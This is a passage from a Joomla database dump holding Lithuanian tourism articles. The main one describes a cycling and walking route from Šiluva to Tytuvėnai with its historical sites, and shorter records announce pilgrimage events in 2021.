Roglaičiai šiandien yra kelių namų kaimas, tačiau praeityje čia būta dvaro, „rimto“ malūno, vyko kaimo kultūrinis ir ekonominis gyvenimas. Keliautojus pasitinkanti balta koplytėlė mena tarpukario Lietuvos įvykius. 1930 m. Lietuvoje iškilmingai buvo švenčiamos Vytauto Didžiojo mirties 500 metų metinės. Nepriklausomybės kovų dalyvio Jono Bučinsko (g. 1901 m., Roglaičiuose) iniciatyva Roglaičių kaimo Pavasarininkų kuopa tais pačiais metais prie kelio Šiluva-Tytuvėnai pastatė paprastų formų koplytėlę, skirtą atminti šį Lietuvai svarbų įvykį, o kartu įamžinant ir netoliese esančias senąsias Roglaičių kapines, kurios jau anuomet buvo nykstančios. Nuo koplytėlės pažvelgus kiek toliau, apie 250 m nuo kelio, ant kalvelės dešinėje pusėje matyti medinis koplytstulpis (pastatė Tytuvėnų regioninio parko direkcija), žymintis senųjų Roglaičių kaimo kapines. Vietiniai dažnai šią vietą vadina senkapiais arba Milžinkapiais. Sovietiniais metais senosios kaimo kapinės buvo įtrauktos į saugomų objektų sąrašą. Anuomet užfiksuota, kad kapinės buvo kasinėtos, rasta žmonių kaulų.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/5ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">5.  Koplytėlė, skirta Vytauto Didžiojo 500-osios mirties metinėms. Pastatyta 1930 m. Arno Zmitros nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/6ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">6. Senosios Roglaičių kapinės, 2021 m. Arno Zmitros nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Nuo koplytėlės dviračių taku paėjus ar pavažiavus dar apie 200 metrų, kitoje kelio pusėje, medžių paunksmėje, vis dar šmėžuoja medinis Roglaičių vandens malūnas. Tai vienas iš nedaugelio vandens malūnų išlikusių iki šiol. Skaičiuojama, kad XX a. pr. Raseinių rajono teritorijoje būta virš 20 vandens malūnų (o kur dar vėjo, garo ir motoro malūnai). Iki mūsų dienų neliko nei vieno veikiančio vandens malūno. Belieka pasidžiaugti, kad turime du išlikusius vandens malūno pastatus: Maslauskiškių vandens malūnas (Betygalos sen.) ir šį – Roglaičių malūną.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Iš archyvuose randamų dokumentų žinoma, jog Roglaičių malūnas įkurtas apie 1834 m., ant Lapišės upelio. 1919 m. malūną iš dvarininkės Savickienės įsigijo Viktoras Adomavičius. Tarpukariu malūne dirbo pats savininkas, darbas dėl vandens svyravimo buvo sezoninis, dirbta pavasarį ir rudenį. Dabar matomas malūnas tvarkytas pagal 1933 m. parengtą projektą. Sovietmečiu malūnas buvo nacionalizuotas, naudotas kolūkio ir apylinkės gyventojų reikmėms. 1991 m.  V. Adomavičiaus artimieji atsiėmė nuosavybę. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/7ok.png\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">7. 1933 m. parengto malūno projekto fragmentai. LCVA. </span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/8ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">8. Roglaičių vandens malūnas, 2020 m. A.Zmitros nuotr. </span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Įveikus 4 šio tako kilometrus baigiasi Roglaičių kaimas ir čia pat, prieš mišką, bei Raseinių ir Kelmės rajonų „rubežių“, keliautojus pasitinka piligrimų globėjas – Šv. Jokūbas. 2014 metais Amerikos lietuvė Rožė Šomkaitė susipažinusi su liaudies meistro, tautodailininko Adolfo Teresiaus darbais, nusprendė skirti lėšų naujo kryžiaus sukūrimui, kurį norėjo pastatyti Kryžių kalne, tačiau po diskusijų buvo nuspręsta sukurti stogastulpį Šv. Jokūbui, piligrimų globėjui, ir pastatyti jį tarp Šiluvos ir Tytuvėnų, nes tai paskutinė piligrimų poilsio stotelė prieš įžengimą į Šiluvos šventovę. 2015 m. gegužės 21 d. pastatytą stogastulpį pašventino kardinolas Sigitas Tamkevičius.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/9ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">9. Stogastulpis  Šv. Jokūbui, 2020 m. A. Zmitros nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Keliaudami toliau pateksite į Kelmės rajono teritoriją, kur už miško Jus pasitiks Vičiai. Juose dar galima pamatyti žymiąsias Vičių skulptūras, kitų dar vadinamas „Velnių muziejumi“. Šį kaimą išgarsino savamokslis dailininkas ir skulptorius Petras Stundžia (1921–1990 m.). Dirbęs su medžiu ir akmeniu, menininkas prieš pusę amžiaus pradėjo kurti žaismingą sodybą, kuri anuomet traukė smalsuolių akį. Kai kurie juokauja, kad tokioje šventoje vietoje, netoli Šiluvos, buvo susibėgę visi Lietuvos velniai, čia buvęs net Velnio malūnas. Deja, bet po P. Stundžios mirties sodyba buvo apleista, dalis skulptūrų pavogta ar sunyko. Galime pasidžiaugti, jog šiandien šią vietą puoselėja Tytuvėnų regioninio parko direkcija, kai kurios skulptūros atstatytos, yra įrengtas informacinis stendas. Keliautojus pasitinka didysis velnias Belzebubas, išdidžiai besižvalgąs nuo galingo akmens.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/10ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">10. Prie Velnio malūno, XX a. 9 deš. I. Žagužauskaitės nuotr</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/11ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">11. Keliautojus pasitinkantis didysis velnias Belzebubas, 2021 m. A. Zmitros nuotr. </span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Šiame kelyje galima susipažinti ir su partizaninio karo istorijomis. Apie 200 metrų į pietus nuo P. Stundžios sodybos matyti tipinis Lietuvos gyventojų genocido ir rezistencijos tyrimo centro ženklas, žymintis Kęstučio apygardos vado Povilo Morkūno ir štabo nario Stasio Zinkevičiaus kautynių ir žūties vietą. Surengus klastingą susitikimą 1953 m. birželio 19 d. agentai smogikai P. Morkūną ir S. Zinkevičių šioje vietoje nušauti. Kęstučio apygardos vadas P. Morkūnas  gimė 1914 m. Zbaro kaime, prie Šiluvos (dab. Raseinių r.). Baigė Raseinių žemės ūkio mokyklą, dalyvavo 1941 m. birželio sukilime, buvo LLA narys. Nacių okupacijos metais dirbo policininku. Antrosios sovietinės okupacijos pradžioje pasitraukė į mišką partizanauti. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/12ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">12. P. Morkūno ir S. Zinkevičiaus kautynių ir žūties vieta, 2021 m. A. Zmitros nuotr. </span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Nuo Vičių laukia apie 2 km gana tiesaus kelio iki Tytuvėnų, pravažiuosite Rutelių kaimą ir pasieksite Tytuvėnų miestą. Tik įvažiavus, dešinėje Šiluvos gatvės pusėje, ant antro namo fasado pastebėsite esančią atminimo lentą, kuri skirta čia gimusiam gydytojui higienistui, profesoriui Emilijui Andriuliui (1928-1991 m.). Keliaujant toliau ir nusileidus pakalnėn prieš akis atsiveria Šv. Jurgio kalnelis. Padavimas byloja, kad čia buvusi lietuvių šventovė – alkas. Po ąžuolu degė amžinoji ugnis, kurią kurstė vaidilutės. Po Lietuvos krikšto, 1581 m. ant šio kalnelio buvo pastatyta Šv. Jurgio bažnytėlė. Užlipę ant kalnelio galite pamatyti išlikusių pamatų ir kažkada buvusių kapinaičių paminklų likučius. Prieš pat Tytuvėnų aikštę, dešinėje pusėje išvysite seną, medinį pastatą, kuriame 1900-1948 m. veikė Tytuvėnų pradžios mokykla. XX a. II p. čia buvo įsikūrusi vykdomojo komiteto kontora, vėliau Tytuvėnų vidurinės mokyklos bendrabutis. Nuo 2013 m. šiame pastate veikia biblioteka. Ant pastato pakabinta atminimo lenta. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Šios kelionės galutiniu tašku siūlau pasirinkti Tytuvėnų miesto centrinę aikštę, kurioje keliautojus pasitinka Švč. Mergelės Marijos Angelų karalienės bažnyčios ir bernardinų vienuolyno ansamblis, Raseinių krašto dainiaus Maironio biustas, vienos žymiausių Žemaitijos moterų – Sofijos Romerienės skulptūra ir Tytuvėnų Dievo Motinos ikonos „Kazanskaja“ cerkvė. Pasirinkę kelionės starto vietą Šiluvos turgaus aikštę ir kelionę baigę Tytuvėnų aikštėje būsite įveikę 8 km. </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span><img src=\"images/stories/naujienos/naujuoju_taku/13ok.jpg\" border=\"0\" alt=\"\" /></span></span></span></span></span></span></p>\r\n<p style=\"text-align: center;\"><strong><em><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">13. Tytuvėnai. K. Zavadskio nuotr.</span></em></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span>Plačiau susipažinti su Šiluvos apylinkių objektais galite Šiluvos šventovės internetinėje svetainėje www.siluva.lt arba VšĮ „Atrask Raseinius“ internetinėje svetainėje <a href=\"http://www.atraskraseinius.lt\" target=\"_blank\">www.atraskraseinius.lt</a> . Su Tytuvėnų apylinkių lankytinais objektais galite susipažinti Tytuvėnų regioninio parko direkcijos internetinėje svetainėje<a href=\"%20http:/www.trp.lt%20\" target=\"_blank\"> www.trp.lt </a>arba Tytuvėnų piligrimų centro internetiniame puslapyje <a href=\"http://www.infotytuvenai.lt\" target=\"_blank\">www.infotytuvenai.lt</a> . </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span>Belieka tik palinkėti dviratininkams ar žygeiviams gerų įspūdžių ir priminti, jog pradėję ar pabaigę kelionę pėsčiomis ar dviračiu, galite gyvai apsilankyti Šiluvos, Tytuvėnų piligrimų centre arba Tytuvėnų regioninio parko direkcijos lankytojų centre. Ten dirbantys specialistai Jums padės geriau pažinti Šiluvos ir Tytuvėnų apylinkes, patars kur geriausia stovyklauti ir ką būtina patirti! </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span> </span></span></span></p>\r\n<p style=\"text-align: right;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\">VšĮ „Atrask Raseinius“ direktorius Arnas Zmitra</span></strong></p>',1,0,0,44,'2021-05-09 06:08:11',135,'','2021-05-09 06:35:33',135,0,'0000-00-00 00:00:00','2021-05-09 06:08:11','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/naujuoju_taku\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,39,'','',1,1956,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(351,440,'Piligrimystės mėnuo','piligrimystes-menuo','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Rengininių kalendorius: <strong>Piligrimystės mėnuo</strong><br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/piligrimystes_menuo/piligrimystes_menuo.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2021-05-18 20:55:47',135,'','2021-05-18 20:59:07',135,0,'0000-00-00 00:00:00','2021-05-18 20:55:47','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/piligrimystes_menuo\\/piligrimystes_menuo_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,38,'','',1,2090,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(352,441,'Piligriminis žygis','piligriminis-zygis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">PILIGRIMINIS ŽYGIS  ŠV. ANTANO GARBEI<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><strong>PALENDRIAI-TYTUVĖNAI ±32 KM. 2021 M. BIRŽELIO 12 D.</strong></span><strong style=\"text-align: right; font-size: 12.16px;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 18px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; -webkit-text-stroke-width: 0px; float: none; background-color: #ffffff; display: inline !important;\"><br /></span></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><strong>Programa</strong></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">8:00  –  registracija Tytuvėnų piligrimų centras (išankstinės registracijos tikslinimas)</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">8:40  – išvykimas  autobusu į Palendrių Šv. Benedikto vienuolyną.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">9:30  – išlydėjimas į pėsčiųjų žygį. Vienuolių palaiminimas. Žodis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">10:00 – pėsčiųjų žygio Palendriai – Tytuvėnai pradžia (±32km.)</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">14:00 –  Pietūs  prie Burbaičių piliakalnio.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">19:00 –  Tytuvėnų bažnyčia. Atsisveikinimas. Žygio pabaiga.</span></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">RENGINYS NEMOKAMAS</span></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Registracija  į renginį būtina  telefonu 8 672 441 99/el.p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a> arba <a href=\"https://forms.gle/qkaNpTXybkWkF37TA\" target=\"_parent\">https://forms.gle/qkaNpTXybkWkF37TA</a></span></p>\r\n<p style=\"text-align: justify;\"> <span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: 